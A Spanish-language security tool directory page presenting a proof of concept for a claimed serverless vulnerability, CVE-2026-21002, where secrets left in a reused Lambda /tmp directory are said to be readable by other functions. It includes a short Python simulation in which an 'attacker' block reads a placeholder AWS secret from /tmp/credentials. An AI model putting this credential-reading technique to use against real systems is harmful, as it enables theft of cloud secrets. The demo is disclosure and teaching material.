Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-21002-Serverless-Cold-Start-Credential-Leakage-via-Reused-tmp — Exploit PoC para CVE-2026-21002 sobre fuga de credenciales en arranque en frío (cold-start) serverless, que demuestra cómo los directorios /tmp reutilizados de Lambda exponen secretos de AWS a otras funciones. | Kitploit
Herramientas/GitHubGitHub/george0papasotiriou/cve-2026-21002-serverless-cold-start-credential-leakage-via-reused-tmp
Seguridad de Infraestructura en la NubeAnálisis de VulnerabilidadesExplotaciónSeguridad ServerlessExfiltración de DatosSeguridad en la NubeAprendizaje y Educación
GitHubgeorge0papasotiriou/cve-2026-21002-serverless-cold-start-credential-leakage-via-reused-tmp

CVE-2026-21002-Serverless-Cold-Start-Credential-Leakage-via-Reused-tmp

Exploit PoC para CVE-2026-21002 sobre fuga de credenciales en arranque en frío (cold-start) serverless, que demuestra cómo los directorios /tmp reutilizados de Lambda exponen secretos de AWS a otras funciones.

Ver Repositorio
9hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-21002 – Fuga de credenciales en arranque en frío de funciones serverless mediante reutilización de /tmp

Código del programa (simulación de AWS Lambda en Python)

root@kitploit:~
# lambda_func_sim.py - Simulated serverless function
import os, tempfile, time

SECRET_FILE = '/tmp/credentials'  # reused across warm starts

def handler(event):
    # On first invocation, write a secret
    if not os.path.exists(SECRET_FILE):
        with open(SECRET_FILE, 'w') as f:
            f.write("AWS_SECRET_ACCESS_KEY=sk-123456")
        return "Initialized"
    # Later invocations can read it
    with open(SECRET_FILE) as f:
        return f.read()

# Attack simulation: attacker shares the same /tmp in another function (same VM)
# They can read /tmp/credentials after a cold start.
with open(SECRET_FILE) as f:
    print("Attacker reads:", f.read())

CVE-2026-21002 – Fuga de credenciales en arranque en frío de funciones serverless

Severity: Critical

Resumen

Las plataformas serverless reutilizan el entorno de ejecución (incluido /tmp) entre invocaciones de funciones e incluso entre diferentes funciones de la misma cuenta. La función de un atacante puede leer archivos sensibles dejados en /tmp por otra función después de un arranque en frío, lo que conduce al robo de credenciales.

Detalles de la vulnerabilidad

  • Tipo: Divulgación de información / Fuga entre funciones
  • Impacto: Compromiso de credenciales, movimiento lateral.
  • Causa raíz: El directorio /tmp se comparte entre contenedores en caliente sin aislamiento entre funciones.

Demostración del exploit

Ejecute la simulación:

root@kitploit:~
python lambda_func_sim.py

El atacante lee la AWS_SECRET_ACCESS_KEY dejada por la función de la víctima.

Descargar herramienta